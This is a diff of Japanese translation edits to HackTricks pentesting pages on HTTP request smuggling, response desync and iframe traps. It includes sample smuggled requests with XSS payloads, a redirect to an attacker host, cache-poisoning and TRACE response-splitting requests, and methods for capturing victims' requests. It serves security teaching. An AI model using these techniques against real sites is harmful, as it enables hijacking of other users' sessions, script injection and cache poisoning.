 - 技術は[こちらで報告されています](https://www.bugcrowd.com/blog/unveiling-te-0-http-request-smuggling-discovering-a-critical-vulnerability-in-thousands-of-google-cloud-websites/)。
 - **例:**
 ```
@@ -185,7 +185,7 @@ EMPTY_LINE_HERE
 
 この技術は、**初期のHTTPデータを読み取る際にウェブサーバーを破壊する**ことが可能なシナリオでも有用ですが、**接続を閉じることなく**行います。この方法では、HTTPリクエストの**ボディ**が**次のHTTPリクエスト**として扱われます。
 
-例えば、[**この書き込み**](https://mizu.re/post/twisty-python)で説明されているように、Werkzeugではいくつかの**Unicode**文字を送信することでサーバーが**破壊**されることが可能でした。しかし、HTTP接続が**`Connection: keep-alive`**ヘッダーで作成された場合、リクエストのボディは読み取られず、接続は依然としてオープンのままとなり、リクエストの**ボディ**は**次のHTTPリクエスト**として扱われます。
+例えば、[**この書き込み**](https://mizu.re/post/twisty-python)で説明されているように、Werkzeugではいくつかの**Unicode**文字を送信することでサーバーが**破壊**されることが可能でした。しかし、HTTP接続が**`Connection: keep-alive`**ヘッダーで作成された場合、リクエストのボディは読み取られず、接続は依然としてオープンのままとなるため、リクエストの**ボディ**は**次のHTTPリクエスト**として扱われます。
 
 #### ホップバイホップヘッダーによる強制
 
@@ -201,7 +201,7 @@ Connection: Content-Length
 
 ## HTTPリクエストスムージングの発見
 
-HTTPリクエストスムージングの脆弱性を特定するには、サーバーが操作されたリクエストに応答するのにかかる時間を観察するタイミング技術を使用することがよくあります。これらの技術は、特にCL.TEおよびTE.CLの脆弱性を検出するのに役立ちます。これらの方法に加えて、他にも脆弱性を見つけるために使用できる戦略やツールがあります。
+HTTPリクエストスムージングの脆弱性を特定するには、サーバーが操作されたリクエストに応答するのにかかる時間を観察するタイミング技術を使用することがよくあります。これらの技術は、特にCL.TEおよびTE.CLの脆弱性を検出するのに役立ちます。これらの方法に加えて、他にもこのような脆弱性を見つけるために使用できる戦略やツールがあります。
 
 ### タイミング技術を使用したCL.TE脆弱性の発見
 
@@ -227,8 +227,8 @@ A
 - バックエンドサーバーはチャンクメッセージを期待しており、決して到着しない次のチャンクを待機し、遅延を引き起こします。
 
 - **指標:**
-- タイムアウトまたは応答の長い遅延。
-- バックエンドサーバーから400 Bad Requestエラーを受信することがあり、時には詳細なサーバー情報が含まれます。
+- タイムアウトや応答の長い遅延。
+- バックエンドサーバーからの400 Bad Requestエラーを受信することがあり、時には詳細なサーバー情報が含まれます。
 
 ### タイミング技術を使用したTE.CL脆弱性の発見
 
@@ -265,7 +265,7 @@ X
 
 ### HTTPリクエストスムージング脆弱性テスト
 
-タイミング技術の効果を確認した後、クライアントリクエストを操作できるかどうかを検証することが重要です。簡単な方法は、リクエストを毒殺することを試みることです。たとえば、`/`へのリクエストが404応答を返すようにします。前述の`CL.TE`および`TE.CL`の例は、クライアントが異なるリソースにアクセスしようとしているにもかかわらず、404応答を引き出すためにクライアントのリクエストを毒殺する方法を示しています。
+タイミング技術の効果を確認した後、クライアントリクエストを操作できるかどうかを検証することが重要です。簡単な方法は、リクエストを毒することを試みることです。たとえば、`/`へのリクエストが404応答を返すようにします。前述の`CL.TE`および`TE.CL`の例は、クライアントが異なるリソースにアクセスしようとしているにもかかわらず、404応答を引き出すためにクライアントのリクエストをどのように毒するかを示しています。
 
 **重要な考慮事項**
 
@@ -273,7 +273,7 @@ X
 
 - **異なるネットワーク接続:** 「攻撃」と「正常」リクエストは、別々のネットワーク接続を介して送信する必要があります。両方のリクエストに同じ接続を使用することは、脆弱性の存在を検証しません。
 - **一貫したURLとパラメータ:** 両方のリクエストに対して同一のURLとパラメータ名を使用することを目指してください。現代のアプリケーションは、URLとパラメータに基づいてリクエストを特定のバックエンドサーバーにルーティングすることがよくあります。これらを一致させることで、両方のリクエストが同じサーバーによって処理される可能性が高まります。これは成功する攻撃の前提条件です。
-- **タイミングとレース条件:** 「正常」リクエストは、「攻撃」リクエストからの干渉を検出するために設計されており、他の同時アプリケーションリクエストと競合します。したがって、「攻撃」リクエストの直後に「正常」リクエストを送信してください。忙しいアプリケーションでは、決定的な脆弱性確認のために複数の試行が必要になる場合があります。
+- **タイミングとレース条件:** 「正常」リクエストは、「攻撃」リクエストからの干渉を検出するために設計されており、他の同時アプリケーションリクエストと競合します。したがって、「攻撃」リクエストの直後に「正常」リクエストを送信してください。忙しいアプリケーションでは、脆弱性の確認のために複数の試行が必要になる場合があります。
 - **負荷分散の課題:** フロントエンドサーバーが負荷分散装置として機能する場合、リクエストをさまざまなバックエンドシステムに分配することがあります。「攻撃」と「正常」リクエストが異なるシステムに到達した場合、攻撃は成功しません。この負荷分散の側面は、脆弱性を確認するためにいくつかの試行を必要とする場合があります。
 - **意図しないユーザーへの影響:** あなたの攻撃が他のユーザーのリクエスト（検出のために送信した「正常」リクエストではない）に偶然影響を与える場合、これはあなたの攻撃が他のアプリケーションユーザーに影響を与えたことを示します。継続的なテストは他のユーザーを混乱させる可能性があるため、慎重なアプローチが必要です。
 
@@ -377,7 +377,7 @@ csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=asdfghjklo&email=email%40ema
 ```
 このシナリオでは、**comment parameter**は公開アクセス可能なページの投稿のコメントセクション内の内容を保存することを目的としています。その結果、次のリクエストの内容はコメントとして表示されます。
 
-しかし、この技術には制限があります。一般的に、これはスムーズにリクエストで使用されるパラメータ区切り文字までのデータしかキャプチャしません。URLエンコードされたフォーム送信の場合、この区切り文字は`&`文字です。これは、被害者ユーザーのリクエストからキャプチャされた内容が最初の`&`で停止することを意味し、これはクエリ文字列の一部である可能性さえあります。
+しかし、この技術には制限があります。一般的に、これはスムーズにリクエストで使用されるパラメータ区切り文字までのデータしかキャプチャしません。URLエンコードされたフォーム送信の場合、この区切り文字は`&`文字です。これは、被害者ユーザーのリクエストからキャプチャされた内容が最初の`&`で止まることを意味し、これはクエリ文字列の一部である可能性さえあります。
 
 さらに、このアプローチはTE.CL脆弱性でも有効であることに注意する価値があります。その場合、リクエストは`search=\r\n0`で終了する必要があります。改行文字に関係なく、値は検索パラメータに追加されます。
 
@@ -386,9 +386,9 @@ csrf=gpGAVAbj7pKq7VfFh45CAICeFCnancCM&postId=4&name=asdfghjklo&email=email%40ema
 HTTP Request Smugglingは、**Reflected XSS**に脆弱なウェブページを悪用するために利用でき、重要な利点を提供します：
 
 - 対象ユーザーとの**対話は不要**です。
-- 通常は**アクセスできない**リクエストの一部、例えばHTTPリクエストヘッダーでXSSを悪用することができます。
+- HTTPリクエストヘッダーのような**通常は到達不可能な**リクエストの一部でXSSを悪用することができます。
 
-ウェブサイトがUser-Agentヘッダーを通じて反射型XSSに対して脆弱な場合、以下のペイロードはこの脆弱性を悪用する方法を示しています：
+ウェブサイトがUser-Agentヘッダーを介して反射型XSSに対して脆弱な場合、以下のペイロードはこの脆弱性を悪用する方法を示しています：
 ```
 POST / HTTP/1.1
 Host: ac311fa41f0aa1e880b0594d008d009e.web-security-academy.net
@@ -411,24 +411,24 @@ A=
 ```
 このペイロードは、脆弱性を悪用するために構成されています：
 
-1. `Transfer-Encoding: chunked` ヘッダーを使用して、密輸の開始を示す、見た目には典型的な `POST` リクエストを開始します。
-2. 次に、チャンクメッセージボディの終わりを示す `0` が続きます。
-3. その後、密輸された `GET` リクエストが導入され、`User-Agent` ヘッダーにスクリプト `<script>alert(1)</script>` が注入され、サーバーがこの後続のリクエストを処理する際に XSS がトリガーされます。
+1. `Transfer-Encoding: chunked` ヘッダーを持つ、見た目には典型的な `POST` リクエストを開始し、スムーグリングの開始を示します。
+2. 次に `0` を続け、チャンク化されたメッセージボディの終わりを示します。
+3. その後、スムーグルされた `GET` リクエストが導入され、`User-Agent` ヘッダーにスクリプト `<script>alert(1)</script>` が注入され、サーバーがこの後続のリクエストを処理する際に XSS がトリガーされます。
 
-`User-Agent` を密輸によって操作することで、ペイロードは通常のリクエスト制約を回避し、非標準だが効果的な方法で反射型 XSS 脆弱性を悪用します。
+スムーグリングを通じて `User-Agent` を操作することで、ペイロードは通常のリクエスト制約を回避し、非標準だが効果的な方法で反射型 XSS 脆弱性を悪用します。
 
 #### HTTP/0.9
 
 > [!CAUTION]
 > ユーザーコンテンツが **`Content-type`** が **`text/plain`** のレスポンスに反映される場合、XSS の実行が防止されます。サーバーが **HTTP/0.9** をサポートしている場合、これを回避できる可能性があります！
 
-HTTP/0.9 バージョンは 1.0 の前のもので、**GET** 動詞のみを使用し、**ヘッダー** ではなく、ボディのみで応答します。
+HTTP/0.9 バージョンは 1.0 の前のもので、**GET** 動詞のみを使用し、**ヘッダー** ではなくボディのみで応答します。
 
-[**この書き込み**](https://mizu.re/post/twisty-python) では、リクエスト密輸と **ユーザーの入力に応じて応答する脆弱なエンドポイント** を使用して、HTTP/0.9 でリクエストを密輸することが悪用されました。レスポンスに反映されるパラメータには **偽の HTTP/1.1 レスポンス（ヘッダーとボディを含む）** が含まれており、レスポンスには `Content-Type` が `text/html` の有効な実行可能な JS コードが含まれます。
+[**この書き込み**](https://mizu.re/post/twisty-python) では、リクエストスムーグリングと **ユーザーの入力に応じて応答する脆弱なエンドポイント** を使用して、HTTP/0.9 でリクエストをスムーグルすることが悪用されました。レスポンスに反映されるパラメータには **偽の HTTP/1.1 レスポンス（ヘッダーとボディを含む）** が含まれており、レスポンスには `Content-Type` が `text/html` の有効な実行可能な JS コードが含まれます。
 
-### HTTP リクエスト密輸を使用したオンサイトリダイレクトの悪用 <a href="#exploiting-on-site-redirects-with-http-request-smuggling" id="exploiting-on-site-redirects-with-http-request-smuggling"></a>
+### HTTP リクエストスムーグリングを使用したオンサイトリダイレクトの悪用 <a href="#exploiting-on-site-redirects-with-http-request-smuggling" id="exploiting-on-site-redirects-with-http-request-smuggling"></a>
 
-アプリケーションは、リダイレクト URL の `Host` ヘッダーからホスト名を使用して、ある URL から別の URL にリダイレクトすることがよくあります。これは、Apache や IIS のようなウェブサーバーで一般的です。たとえば、末尾にスラッシュがないフォルダーをリクエストすると、スラッシュを含めるようにリダイレクトされます：
+アプリケーションは、リダイレクト URL の `Host` ヘッダーからホスト名を使用して、ある URL から別の URL にリダイレクトすることがよくあります。これは、Apache や IIS のようなウェブサーバーで一般的です。たとえば、末尾にスラッシュがないフォルダーをリクエストすると、スラッシュを含めるためにリダイレクトされます：
 ```
 GET /home HTTP/1.1
 Host: normal-website.com
@@ -464,17 +464,17 @@ Host: vulnerable-website.com
 HTTP/1.1 301 Moved Permanently
 Location: https://attacker-website.com/home/
 ```
-このシナリオでは、ユーザーのJavaScriptファイルへのリクエストがハイジャックされます。攻撃者は、悪意のあるJavaScriptを応答として提供することで、ユーザーを危険にさらす可能性があります。
+このシナリオでは、ユーザーのJavaScriptファイルへのリクエストがハイジャックされます。攻撃者は、応答として悪意のあるJavaScriptを提供することで、ユーザーを危険にさらす可能性があります。
 
-### HTTPリクエストスムージングを介したWebキャッシュポイズニングの悪用 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
+### HTTPリクエストスムージングを介したウェブキャッシュポイズニングの悪用 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
-Webキャッシュポイズニングは、**フロントエンドインフラストラクチャがコンテンツをキャッシュする**任意のコンポーネントがある場合に実行できます。通常、これはパフォーマンスを向上させるためです。サーバーの応答を操作することで、**キャッシュをポイズン**することが可能です。
+ウェブキャッシュポイズニングは、**フロントエンドインフラストラクチャの任意のコンポーネントがコンテンツをキャッシュする**場合に実行できます。通常、これはパフォーマンスを向上させるためです。サーバーの応答を操作することで、**キャッシュをポイズン**することが可能です。
 
-以前、サーバーの応答を変更して404エラーを返す方法を観察しました（[基本的な例](./#basic-examples)を参照）。同様に、サーバーを騙して`/static/include.js`へのリクエストに対して`/index.html`のコンテンツを提供させることも可能です。その結果、`/static/include.js`のコンテンツはキャッシュ内で`/index.html`のものに置き換えられ、ユーザーが`/static/include.js`にアクセスできなくなり、サービス拒否（DoS）につながる可能性があります。
+以前、サーバーの応答を変更して404エラーを返す方法を観察しました（[Basic Examples](./#basic-examples)を参照）。同様に、サーバーを騙して`/static/include.js`へのリクエストに対して`/index.html`のコンテンツを提供させることも可能です。その結果、`/static/include.js`のコンテンツはキャッシュ内で`/index.html`のものに置き換えられ、ユーザーは`/static/include.js`にアクセスできなくなり、最終的にはサービス拒否（DoS）につながる可能性があります。
 
-この技術は、**オープンリダイレクトの脆弱性**が発見された場合や、**オープンリダイレクトへのオンサイトリダイレクト**がある場合に特に強力になります。このような脆弱性を悪用して、攻撃者の制御下にあるスクリプトで`/static/include.js`のキャッシュコンテンツを置き換えることができ、実質的にすべてのクライアントに対して広範なクロスサイトスクリプティング（XSS）攻撃を可能にします。
+この技術は、**オープンリダイレクトの脆弱性**が発見された場合や、**オープンリダイレクトへのサイト内リダイレクト**がある場合に特に強力になります。このような脆弱性を利用して、攻撃者の制御下にあるスクリプトで`/static/include.js`のキャッシュコンテンツを置き換えることができ、実質的にすべてのクライアントに対して広範なクロスサイトスクリプティング（XSS）攻撃を可能にします。
 
-以下は、**キャッシュポイズニングとオープンリダイレクトへのオンサイトリダイレクトを組み合わせた悪用**の例です。目的は、攻撃者が制御するJavaScriptコードを提供するために`/static/include.js`のキャッシュコンテンツを変更することです：
+以下は、**キャッシュポイズニングとオープンリダイレクトへのサイト内リダイレクトの組み合わせを悪用する**例です。目的は、攻撃者が制御するJavaScriptコードを提供するために`/static/include.js`のキャッシュコンテンツを変更することです：
 ```
 POST / HTTP/1.1
 Host: vulnerable.net
@@ -492,7 +492,7 @@ Content-Length: 10
 
 x=1
 ```
-埋め込まれたリクエストが `/post/next?postId=3` をターゲットにしていることに注意してください。このリクエストは `/post?postId=4` にリダイレクトされ、**Host ヘッダーの値**を利用してドメインを決定します。**Host ヘッダー**を変更することで、攻撃者はリクエストを自分のドメインにリダイレクトできます（**オンサイトリダイレクトからオープンリダイレクト**）。
+埋め込まれたリクエストが `/post/next?postId=3` をターゲットにしていることに注意してください。このリクエストは `/post?postId=4` にリダイレクトされ、**Host ヘッダーの値**を使用してドメインを決定します。**Host ヘッダー**を変更することで、攻撃者はリクエストを自分のドメインにリダイレクトできます（**オンサイトリダイレクトからオープンリダイレクト**）。
 
 成功した**ソケットポイズニング**の後、`/static/include.js` に対する**GETリクエスト**を開始する必要があります。このリクエストは、以前の**オンサイトリダイレクトからオープンリダイレクト**リクエストによって汚染され、攻撃者が制御するスクリプトの内容を取得します。
 
@@ -516,11 +516,11 @@ x=1
 `GET /private/messages HTTP/1.1`\
 `Foo: X`
 ```
-このスムグルされたリクエストが静的コンテンツ（例：`/someimage.png`）用のキャッシュエントリを汚染すると、犠牲者の`/private/messages`からの機密データが静的コンテンツのキャッシュエントリの下にキャッシュされる可能性があります。その結果、攻撃者はこれらのキャッシュされた機密データを取得できるかもしれません。
+もしこのスムグルされたリクエストが静的コンテンツ（例：`/someimage.png`）を対象としたキャッシュエントリを汚染する場合、被害者の`/private/messages`からの機密データが静的コンテンツのキャッシュエントリの下にキャッシュされる可能性があります。その結果、攻撃者はこれらのキャッシュされた機密データを取得できるかもしれません。
 
 ### HTTPリクエストスムグリングを利用したTRACEの悪用 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
-[**この投稿**](https://portswigger.net/research/trace-desync-attack)では、サーバーにTRACEメソッドが有効になっている場合、HTTPリクエストスムグリングを利用することが可能であると提案されています。これは、このメソッドがサーバーに送信された任意のヘッダーをレスポンスのボディの一部として反映するためです。例えば：
+[**この投稿**](https://portswigger.net/research/trace-desync-attack)では、サーバーにTRACEメソッドが有効になっている場合、HTTPリクエストスムグリングを利用して悪用できる可能性があると示唆されています。これは、このメソッドがサーバーに送信された任意のヘッダーをレスポンスのボディの一部として反映するためです。例えば：
 ```
 TRACE / HTTP/1.1
 Host: example.com
@@ -537,13 +537,13 @@ Host: vulnerable.com
 XSS: <script>alert("TRACE")</script>
 X-Forwarded-For: xxx.xxx.xxx.xxx
 ```
-この動作を悪用する例としては、**最初にHEADリクエストをスムグル**ことが挙げられます。このリクエストには、GETリクエストの**ヘッダー**のみが応答されます（**`Content-Type`**を含む）。そして、**HEADの後にすぐにTRACEリクエストをスムグル**し、送信されたデータを**反映させる**ことができます。\
-HEADの応答には`Content-Length`ヘッダーが含まれるため、**TRACEリクエストの応答はHEAD応答のボディとして扱われ、したがって任意のデータを反映させることができます**。\
+この動作を悪用する例としては、**最初にHEADリクエストをスムグル**ことが挙げられます。このリクエストには、GETリクエストの**ヘッダー**のみが応答されます（その中には**`Content-Type`**も含まれます）。そして、**HEADの後にすぐにTRACEリクエストをスムグル**し、送信されたデータを**反映させる**ことができます。\
+HEADの応答には`Content-Length`ヘッダーが含まれるため、**TRACEリクエストの応答はHEAD応答のボディとして扱われ、したがって任意のデータを反映させることになります**。\
 この応答は接続上の次のリクエストに送信されるため、例えば**キャッシュされたJSファイルで任意のJSコードを注入するために使用される可能性があります**。
 
-### HTTPレスポンス分割を介したTRACEの悪用 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
+### HTTPレスポンス分割を利用したTRACEの悪用 <a href="#exploiting-web-cache-poisoning-via-http-request-smuggling" id="exploiting-web-cache-poisoning-via-http-request-smuggling"></a>
 
-[**この投稿**](https://portswigger.net/research/trace-desync-attack)を続けると、TRACEメソッドを悪用する別の方法が提案されています。コメントされたように、HEADリクエストとTRACEリクエストをスムグルすることで、HEADリクエストの応答における**一部の反映データを制御する**ことが可能です。HEADリクエストのボディの長さは基本的にContent-Lengthヘッダーで示され、TRACEリクエストの応答によって形成されます。
+[**この投稿**](https://portswigger.net/research/trace-desync-attack)を引き続き参照することが推奨されており、TRACEメソッドを悪用する別の方法が示されています。コメントの通り、HEADリクエストとTRACEリクエストをスムグルことで、HEADリクエストの応答における**反映されたデータの一部を制御する**ことが可能です。HEADリクエストのボディの長さは基本的にContent-Lengthヘッダーで示され、TRACEリクエストの応答によって形成されます。
 
 したがって、新しいアイデアは、このContent-LengthとTRACE応答で与えられたデータを知ることで、TRACE応答がContent-Lengthの最後のバイトの後に有効なHTTP応答を含むようにすることが可能であり、攻撃者が次の応答へのリクエストを完全に制御できるようにすることです（これによりキャッシュポイズニングを実行することができます）。
 
@@ -566,7 +566,7 @@ Content-Length: 44\r\n
 \r\n
 <script>alert("response splitting")</script>
 ```
-これらのレスポンスを生成します（HEADレスポンスにContent-Lengthがあることに注意してください。これにより、TRACEレスポンスがHEADボディの一部となり、HEADのContent-Lengthが終了すると有効なHTTPレスポンスがスムーズに送信されます）：
+これらのレスポンスを生成します（HEADレスポンスにContent-Lengthが含まれているため、TRACEレスポンスがHEADボディの一部となり、HEADのContent-Lengthが終了すると有効なHTTPレスポンスがスムーズに送信されます）：
 ```
 HTTP/1.1 200 OK
 Content-Type: text/html
@@ -587,29 +587,29 @@ Content-Length: 50
 
 <script>alert(“arbitrary response”)</script>
 ```
-### HTTPレスポンスの非同期化を利用したHTTPリクエストスムーギングの武器化
+### HTTPレスポンスの非同期化を利用したHTTPリクエストスムージングの武器化
 
-HTTPリクエストスムーギングの脆弱性を見つけたが、どのように悪用するかわからない場合は、他の悪用方法を試してみてください。
+HTTPリクエストスムージングの脆弱性を見つけたが、どのように悪用するかわからない場合は、他の悪用方法を試してみてください。
 
 {{#ref}}
 ../http-response-smuggling-desync.md
 {{#endref}}
 
-### その他のHTTPリクエストスムーギング技術
+### その他のHTTPリクエストスムージング技術
 
-- ブラウザHTTPリクエストスムーギング（クライアントサイド）
+- ブラウザHTTPリクエストスムージング（クライアントサイド）
 
 {{#ref}}
 browser-http-request-smuggling.md
 {{#endref}}
 
-- HTTP/2ダウングレードにおけるリクエストスムーギング
+- HTTP/2ダウングレードにおけるリクエストスムージング
 
 {{#ref}}
 request-smuggling-in-http-2-downgrades.md
 {{#endref}}
 
-## ターボイントルーダースクリプト
+## ターボ侵入者スクリプト
 
 ### CL.TE
 
diff --git a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
index 15c939fe2..b532c0074 100644
--- a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
+++ b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
@@ -1,4 +1,4 @@
-# HTTP/2ダウングレードにおけるリクエストスムーギング
+# HTTP/2ダウングレードにおけるリクエストスムージング
 
 {{#include ../../banners/hacktricks-training.md}}
 
diff --git a/src/pentesting-web/http-response-smuggling-desync.md b/src/pentesting-web/http-response-smuggling-desync.md
index 1f3cf76f6..72b846d49 100644
--- a/src/pentesting-web/http-response-smuggling-desync.md
+++ b/src/pentesting-web/http-response-smuggling-desync.md
@@ -16,7 +16,7 @@
 
 HTTP/1.1は、**前のリクエストを待つことなく異なるリソースを要求する**ことを許可します。したがって、**中間にプロキシがある場合**、プロキシのタスクは**バックエンドに送信されたリクエストとそこからのレスポンスの同期を維持する**ことです。
 
-しかし、レスポンスキューを非同期化するには問題があります。攻撃者がHTTPレスポンススムージング攻撃を送信し、**最初のリクエストとスムージングされたリクエストへのレスポンスが即座に返される**と、スムージングされたレスポンスは被害者のレスポンスキューに挿入されず、**エラーとして単に破棄されます**。
+しかし、レスポンスキューを非同期化するには問題があります。攻撃者がHTTPレスポンススムージング攻撃を送信し、**最初のリクエストとスムージングされたリクエストのレスポンスが即座に返される**と、スムージングされたレスポンスは被害者のレスポンスキューに挿入されず、**エラーとして単に破棄されます**。
 
 ![](<../images/image (633).png>)
 
@@ -24,7 +24,7 @@ HTTP/1.1は、**前のリクエストを待つことなく異なるリソース
 
 この特定の状況で**被害者がリクエストを送信し、スムージングされたリクエストが正当なリクエストの前に応答される**と、**スムージングされたレスポンスが被害者に送信されます**。したがって、攻撃者は**被害者によって「実行された」リクエストを制御します**。
 
-さらに、**攻撃者がリクエストを実行し、被害者のリクエストに対する正当なレスポンスが攻撃者のリクエストの前に応答される**場合、**被害者へのレスポンスは攻撃者に送信され、**被害者へのレスポンスを**盗む**ことになります（例えば、**Set-Cookie**ヘッダーを含むことがあります）。
+さらに、**攻撃者がリクエストを実行し、被害者のリクエストに対する正当なレスポンスが攻撃者のリクエストの前に応答される**と、**被害者へのレスポンスが攻撃者に送信され、被害者へのレスポンスを「盗む」ことになります**（例えば、**Set-Cookie**ヘッダーを含むことがあります）。
 
 ![](<../images/image (1020).png>)
 
@@ -32,7 +32,7 @@ HTTP/1.1は、**前のリクエストを待つことなく異なるリソース
 
 ### 複数のネストされたインジェクション
 
-一般的な**HTTPリクエストスムージング**とのもう一つの**興味深い違い**は、一般的なスムージング攻撃では、**目的**は**被害者のリクエストの先頭を変更して予期しないアクションを実行させる**ことです。**HTTPレスポンススムージング攻撃**では、**完全なリクエストを送信しているため**、**1つのペイロードに数十のレスポンスを注入**することができ、**数十のユーザーを非同期化**して**注入されたレスポンスを受け取る**ことができます。
+一般的な**HTTPリクエストスムージング**とのもう一つの**興味深い違い**は、一般的なスムージング攻撃では、**目的**は**被害者のリクエストの先頭を変更して予期しないアクションを実行させる**ことです。**HTTPレスポンススムージング攻撃**では、**完全なリクエストを送信するため**、**1つのペイロードに数十のレスポンスを注入**することができ、**数十のユーザーを非同期化させる**ことができます。
 
 正当なユーザーに対して**数十のエクスプロイトをより簡単に配布できる**だけでなく、これはサーバーに**DoS**を引き起こすためにも使用できます。
 
@@ -40,7 +40,7 @@ HTTP/1.1は、**前のリクエストを待つことなく異なるリソース
 
 前述のように、この技術を悪用するには、**サーバーに送信される最初のスムージングメッセージが処理されるのに多くの時間がかかる必要があります**。
 
-この**時間のかかるリクエストは**、**被害者のレスポンスを盗むことを試みるだけであれば十分です**。しかし、より複雑なエクスプロイトを実行したい場合、これはエクスプロイトの一般的な構造になります。
+この**時間のかかるリクエストは、被害者のレスポンスを盗むことを試みるだけで十分です**。しかし、より複雑なエクスプロイトを実行したい場合、これはエクスプロイトの一般的な構造になります。
 
 まず、**HTTPリクエストスムージングを悪用する最初のリクエスト**、次に**時間のかかるリクエスト**、そして**1つ以上のペイロードリクエスト**があり、そのレスポンスが被害者に送信されます。
 
@@ -48,7 +48,7 @@ HTTP/1.1は、**前のリクエストを待つことなく異なるリソース
 
 ### 他のユーザーのリクエストをキャプチャする <a href="#capturing-other-users-requests" id="capturing-other-users-requests"></a>
 
-HTTPリクエストスムージングの既知のペイロードと同様に、**被害者のリクエストを盗む**ことができますが、1つの重要な違いがあります：この場合、**レスポンスに反映されるコンテンツを送信するだけで済み、**永続的なストレージは必要ありません**。
+HTTPリクエストスムージングの既知のペイロードと同様に、**被害者のリクエストを盗むことができます**が、1つの重要な違いがあります：この場合、**レスポンスに反映されるコンテンツを送信するだけで済み、永続的なストレージは必要ありません**。
 
 まず、攻撃者は**反映されたパラメータを含む最終的なPOSTリクエスト**を含むペイロードを送信し、大きなContent-Lengthを指定します。
 
@@ -62,9 +62,9 @@ HTTPリクエストスムージングの既知のペイロードと同様に、*
 
 ## レスポンスの非同期化
 
-ここまでで、HTTPリクエストスムージング攻撃を悪用して、**クライアントが受け取るレスポンスを制御する**方法と、**被害者のために意図されたレスポンスを盗む**方法を学びました。
+ここまでで、HTTPリクエストスムージング攻撃を悪用して、**クライアントが受け取るレスポンスを制御する方法**と、**被害者のために意図されたレスポンスを盗む方法**を学びました。
 
-しかし、レスポンスを**さらに非同期化する**ことも可能です。
+しかし、レスポンスをさらに**非同期化することも可能です**。
 
 **HEAD**リクエストのような興味深いリクエストがあり、これは**レスポンスボディ内にコンテンツを持たないことが指定されており**、**GETリクエストのようにContent-Lengthを含む必要があります**。
 
@@ -76,13 +76,13 @@ HTTPリクエストスムージングの既知のペイロードと同様に、*
 
 ![](<../images/image (999).png>)
 
-その後、**被害者**は**HEAD**リクエストからの**レスポンスを受け取りますが、これは**Content-Lengthを含むがコンテンツは全く含まれない**ものになります。したがって、プロキシは**このレスポンスを被害者に送信せず、**何らかの**コンテンツ**を待つことになります。実際には、これは**攻撃者によって注入された黄色のリクエストへのレスポンス**になります：
+その後、**被害者**は**HEAD**リクエストからの**レスポンスを受け取り**、これは**Content-Lengthを含むがコンテンツは全く含まれない**ことになります。したがって、プロキシは**このレスポンスを被害者に送信せず**、**何らかのコンテンツを待つ**ことになります。実際には、これは**攻撃者によって注入された黄色のリクエストへのレスポンス**になります：
 
 ![](<../images/image (735).png>)
 
 ### コンテンツの混乱
 
-前の例に従い、**被害者が受け取るレスポンスのボディを制御できること**、および**HEAD**レスポンスが通常そのヘッダーに**Content-TypeとContent-Lengthを含むことを知っていると、次のようなリクエストを送信して**XSSを引き起こす**ことができます。これは、ページがXSSに対して脆弱でない場合でも：
+前の例に従い、**被害者が受け取るレスポンスのボディを制御できること**、および**HEAD**レスポンスが通常そのヘッダーに**Content-TypeとContent-Lengthを含むこと**を知っていると、次のようなリクエストを送信して**XSSを引き起こす**ことができます。ページがXSSに対して脆弱でなくても：
 
 ![](<../images/image (688).png>)
 
@@ -99,11 +99,11 @@ XSSペイロードを含む悪意のあるリクエスト：
 ![](<../images/image (566).png>)
 
 > [!WARNING]
-> この場合、**「被害者」が攻撃者である場合、彼は今や**任意のURLでキャッシュ汚染を実行できる**。なぜなら、彼は悪意のあるレスポンスで**キャッシュされるURLを制御できるからです**。
+> この場合、**「被害者」が攻撃者である場合**、彼は**悪意のあるレスポンスでキャッシュされるURLを制御できるため、任意のURLでキャッシュ汚染を実行できます**。
 
 ### ウェブキャッシュの欺瞞
 
-この攻撃は前の攻撃に似ていますが、**ペイロードをキャッシュ内に注入するのではなく、攻撃者が被害者の情報をキャッシュ内に保存します**：
+この攻撃は前の攻撃に似ていますが、**ペイロードをキャッシュ内に注入するのではなく、攻撃者が被害者の情報をキャッシュ内にキャッシュします**：
 
 ![](<../images/image (991).png>)
 
@@ -125,8 +125,8 @@ XSSペイロードを含む悪意のあるリクエスト：
 
 ![](<../images/image (356).png>)
 
-ただし、**反映されたデータがHEADレスポンスのContent-Lengthに応じたサイズを持っていたため、**レスポンスキュー内で有効なHTTPレスポンスを生成しました**。
+ただし、**反映されたデータがHEADレスポンスのContent-Lengthに応じたサイズを持っていたため、レスポンスキュー内で有効なHTTPレスポンスを生成しました**。
 
-したがって、**2番目の被害者の次のリクエストは、**攻撃者によって完全に作成されたものを**レスポンスとして受け取ります**。レスポンスが攻撃者によって完全に作成されているため、攻撃者は**プロキシにレスポンスをキャッシュさせることもできます**。
+したがって、**2番目の被害者の次のリクエストは、攻撃者によって完全に作成されたレスポンスを受け取ることになります**。レスポンスが攻撃者によって完全に作成されているため、攻撃者は**プロキシにレスポンスをキャッシュさせることもできます**。
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/iframe-traps.md b/src/pentesting-web/iframe-traps.md
index e58f07b03..e9f063238 100644
--- a/src/pentesting-web/iframe-traps.md
+++ b/src/pentesting-web/iframe-traps.md
@@ -10,7 +10,7 @@
 
 XSS攻撃は基本的に、画面の100%にiframeでウェブページを読み込みます。したがって、被害者は**iframe内にいることに気づきません**。次に、被害者がiframe内のリンクをクリックしてページをナビゲートすると、彼は**iframe内をナビゲートしている**ことになり、このナビゲーションから情報を盗む任意のJSが読み込まれます。
 
-さらに、より現実的にするために、iframeがページの位置を変更したときにチェックするための**リスナー**を使用し、ユーザーがブラウザを使用してページを移動していると思わせるようにブラウザのURLを更新することが可能です。
